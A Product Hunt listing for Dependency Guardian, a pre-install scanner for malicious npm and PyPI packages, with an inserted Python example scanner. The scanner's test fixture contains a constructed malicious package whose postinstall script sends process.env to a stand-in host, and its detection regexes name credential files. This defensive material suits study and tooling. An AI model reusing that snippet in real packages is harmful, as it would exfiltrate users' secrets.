This product has not been featured by Product Hunt yet.
It will not be visible on their landing page and will not be ranked (it cannot win Product of the Day regardless of upvotes).

Dashboard panels (chart data had not loaded when the page was captured): Product upvotes vs the next 3; Product comments vs the next 3; Product upvote speed vs the next 3; Product upvotes and comments; Product vs the next 3.

Dependency Guardian

Supply chain protection that blocks malware at install

Static supply chain scanner catches npm & PyPI attack patterns CVE databases miss: install scripts, credential theft, child process spawning, network exfil. 100 detectors, sandbox routing for eligible packages, GitHub App + CLI. Free plan.

Top comment

I've been building a tool called Dependency Guardian, and I'm looking for developers and security engineers to try it out. I built it because I wanted protection from malicious npm and PyPI packages without changing how I work. When I went looking for something that already did this, I noticed traditional CVE-based scanning had a blind spot: it only catches problems after they've been reported and assigned a CVE, which leaves a window where a malicious package can spread before anyone flags it. The tool sits in front of package installs and inspects everything that actually lands on your machine, analyzing packages for suspicious behavior and supply chain risk signals before they install. A few things it does:

- Aliases to npm install and pip, so you keep using the commands you already know
- Returns a warn, block, or pass, and prompts on ambiguity
- Runs as both a GitHub App and a CLI

I'd really like feedback from engineers who work with Node, Python, or dependency security. What would stop you from trusting a tool like this? And what would make it useful enough to run every day?
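As an added example (not Dependency Guardian's code, whose internals the page does not show), the following Python script implements the detector categories the listing names (install scripts, child process spawning, network exfiltration, credential access) and returns the pass / warn / block verdict shape the maker describes. The regexes, the correlation rules that decide warn versus block, and the two sample packages are assumptions constructed for illustration; real scanners parse the AST rather than grepping source.

```python
"""Minimal static pre-install scanner for npm packages.

Added example, not Dependency Guardian's code. It covers the detector
categories the listing names (install scripts, child process spawning,
network exfiltration, credential access) and returns pass / warn / block.
"""
import json
import re
from pathlib import Path

# npm lifecycle hooks that execute arbitrary code during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Regex detectors over JavaScript source. Heuristic by design (assumed
# patterns): a production scanner would walk the AST instead.
DETECTORS = [
    ("child_process", re.compile(r"""require\(\s*['"]child_process['"]\s*\)""")),
    ("network", re.compile(r"""require\(\s*['"](?:https?|net|dns|dgram)['"]\s*\)|\bfetch\s*\(""")),
    ("credential_access", re.compile(r"""process\.env\b|\.npmrc\b|\.ssh\b|AWS_SECRET_ACCESS_KEY""")),
    ("obfuscation", re.compile(r"""\beval\s*\(|\bnew Function\s*\(|['"]base64['"]""")),
]


def scan_sources(manifest, sources):
    """manifest: parsed package.json; sources: {relative path: JS text}.
    Returns {"verdict": "pass"|"warn"|"block", "findings": [(detector, location), ...]}."""
    findings = []
    for hook, cmd in manifest.get("scripts", {}).items():
        if hook in INSTALL_HOOKS:
            findings.append(("install_script", f"package.json scripts.{hook}: {cmd}"))
    for path, text in sorted(sources.items()):
        for name, pattern in DETECTORS:
            match = pattern.search(text)
            if match:
                findings.append((name, f"{path}: {match.group(0)}"))
    return {"verdict": verdict(findings), "findings": findings}


def verdict(findings):
    seen = {name for name, _ in findings}
    # Correlated signals separate malware from a build tool that merely spawns
    # a compiler: code that runs at install time and reaches the network or
    # spawns processes, or that reads credentials and reaches the network, is
    # the classic install-time exfiltration shape -> block (assumed policy).
    if "install_script" in seen and seen & {"network", "child_process"}:
        return "block"
    if "credential_access" in seen and "network" in seen:
        return "block"
    # A single signal is ambiguous on its own -> warn and prompt the user.
    if seen:
        return "warn"
    return "pass"


def scan_package(pkg_dir):
    """Scan an unpacked package directory (what would land in node_modules)."""
    pkg_dir = Path(pkg_dir)
    manifest = json.loads((pkg_dir / "package.json").read_text())
    sources = {
        str(p.relative_to(pkg_dir)): p.read_text(errors="replace")
        for p in pkg_dir.rglob("*.js")
        if "node_modules" not in p.parts
    }
    return scan_sources(manifest, sources)


# Constructed sample packages (not real ones) used by the demo and tests.
BENIGN = (
    {"name": "demo-benign", "version": "1.0.0", "scripts": {"test": "node test.js"}},
    {"index.js": "module.exports = (s) => s.toUpperCase();\n"},
)
MALICIOUS = (
    {"name": "demo-benign-helper", "version": "1.0.2",
     "scripts": {"postinstall": "node setup.js"}},
    {
        "index.js": "module.exports = (s) => s.toUpperCase();\n",
        "setup.js": (
            "const https = require('https');\n"
            "const body = JSON.stringify(process.env);\n"
            "https.request({host: 'collector.invalid', method: 'POST'}).end(body);\n"
        ),
    },
)


def demo():
    """Verdict per constructed sample: {'benign': 'pass', 'malicious': 'block'}."""
    return {label: scan_sources(*pkg)["verdict"]
            for label, pkg in (("benign", BENIGN), ("malicious", MALICIOUS))}


if __name__ == "__main__":
    for label, pkg in (("benign", BENIGN), ("malicious", MALICIOUS)):
        result = scan_sources(*pkg)
        print(f"{label}: {result['verdict']}")
        for name, where in result["findings"]:
            print(f"  {name:<18} {where}")
```

Run it directly to see the findings for both samples; `scan_package` takes an already-unpacked directory, which is the point of scanning before install: in the real workflow the tarball would be fetched and unpacked to a scratch directory, scanned, and only then copied into node_modules. The correlation rules are what keep the warn rate tolerable: a lone `child_process` import is common in legitimate tooling and only prompts, while an install hook that also opens a socket is blocked outright.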

About Dependency Guardian on Product Hunt

Dependency Guardian was submitted on Product Hunt and earned 4 upvotes and 1 comment, placing #130 on the daily leaderboard.

On the analytics side, Dependency Guardian competes within Security — topics that collectively have 2.7k followers on Product Hunt. The dashboard above tracks how Dependency Guardian performed against the three products that launched closest to it on the same day.

Who hunted Dependency Guardian?

Dependency Guardian was hunted by mckeane mcbrearty. A “hunter” on Product Hunt is the community member who submits a product to the platform — uploading the images, the link, and tagging the makers behind it. Hunters typically write the first comment explaining why a product is worth attention, and their followers are notified the moment they post. Around 79% of featured launches on Product Hunt are self-hunted by their makers, but a well-known hunter still acts as a signal of quality to the rest of the community. See the full all-time top hunters leaderboard to discover who is shaping the Product Hunt ecosystem.

For a complete overview of Dependency Guardian including community comment highlights and product details, visit the product overview.